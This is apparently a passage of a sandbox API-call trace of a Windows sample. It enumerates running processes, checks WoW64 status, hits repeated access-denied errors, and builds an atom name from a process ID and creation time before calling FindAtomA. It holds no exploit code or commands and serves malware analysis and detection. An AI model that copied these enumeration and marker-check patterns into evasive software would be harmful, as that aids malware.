	[0132.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0132.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.832] CloseHandle (hObject=0x2dc) returned 1
	[0132.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0132.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.833] CloseHandle (hObject=0x2dc) returned 1
	[0132.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0132.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.833] CloseHandle (hObject=0x2dc) returned 1
	[0132.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.834] CloseHandle (hObject=0x2dc) returned 1
	[0132.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.834] CloseHandle (hObject=0x2dc) returned 1
	[0132.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.835] CloseHandle (hObject=0x2dc) returned 1
	[0132.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0132.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.835] CloseHandle (hObject=0x2dc) returned 1
	[0132.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.835] CloseHandle (hObject=0x2dc) returned 1
	[0132.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.836] CloseHandle (hObject=0x2dc) returned 1
	[0132.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.837] CloseHandle (hObject=0x2dc) returned 1
	[0132.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.837] CloseHandle (hObject=0x2dc) returned 1
	[0132.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0132.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.837] CloseHandle (hObject=0x2dc) returned 1
	[0132.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0132.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.838] CloseHandle (hObject=0x2dc) returned 1
	[0132.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0132.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.838] CloseHandle (hObject=0x2dc) returned 1
	[0132.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0132.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.839] CloseHandle (hObject=0x2dc) returned 1
	[0132.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0132.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.839] CloseHandle (hObject=0x2dc) returned 1
	[0132.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.840] CloseHandle (hObject=0x2dc) returned 1
	[0132.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.840] CloseHandle (hObject=0x2dc) returned 1
	[0132.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0132.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.841] CloseHandle (hObject=0x2dc) returned 1
	[0132.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0132.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.841] CloseHandle (hObject=0x2dc) returned 1
	[0132.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.841] CloseHandle (hObject=0x2dc) returned 1
	[0132.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.842] CloseHandle (hObject=0x2dc) returned 1
	[0132.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0132.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.842] CloseHandle (hObject=0x2dc) returned 1
	[0132.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.843] CloseHandle (hObject=0x2dc) returned 1
	[0132.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0132.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.843] CloseHandle (hObject=0x2dc) returned 1
	[0132.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0132.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.844] CloseHandle (hObject=0x2dc) returned 1
	[0132.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.844] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.844] CloseHandle (hObject=0x2dc) returned 1
	[0132.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0132.844] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.844] CloseHandle (hObject=0x2dc) returned 1
	[0132.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0132.845] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.845] CloseHandle (hObject=0x2dc) returned 1
	[0132.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0132.845] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.845] CloseHandle (hObject=0x2dc) returned 1
	[0132.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.846] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.847] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.847] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.847] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.848] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.849] GetLastError () returned 0x5
	[0132.850] GetLastError () returned 0x5
	[0132.850] GetLastError () returned 0x5
	[0132.850] GetLastError () returned 0x5
	[0132.850] GetLastError () returned 0x5
	[0132.850] GetLastError () returned 0x5
	[0132.850] GetLastError () returned 0x5
	[0132.850] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.850] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.850] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.850] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.850] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
